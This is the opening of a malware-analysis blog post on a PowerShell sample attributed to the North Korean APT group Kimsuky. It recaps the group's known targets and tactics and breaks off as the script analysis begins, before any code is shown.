Everyday is lazarus.dayβ

Kimsucky 2

2024-03-09, somedieyoungZZ


Kimsucky 2
In my previous blog post, I covered the analysis of a North Korean-based APT group called Kimsucky APT. We examined a malicious document that utilized a PowerShell script for the adversary’s purposes. Let’s revise some key points about Kimsucky :
- Targets: Primarily targets organizations in South Korea, Japan, and the United States
- Techniques: Often uses malicious documents containing exploits or links to download malware that can steal data or provide remote access.
- Tactics: Employs social engineering techniques (like spear phishing) and watering hole attacks to gain initial access to victim systems.
I found this particular sample of the Kimsucky in wild while doing my daily after wake-up bazaar browsing. Interestingly the sample is very simple and will help people understand how Powershell works. Unfortunately the sample I found didn’t had any connections or the C2’s IP was missing from the script.
Powershell Analysis
Server Connection
Even though the script itself is not at …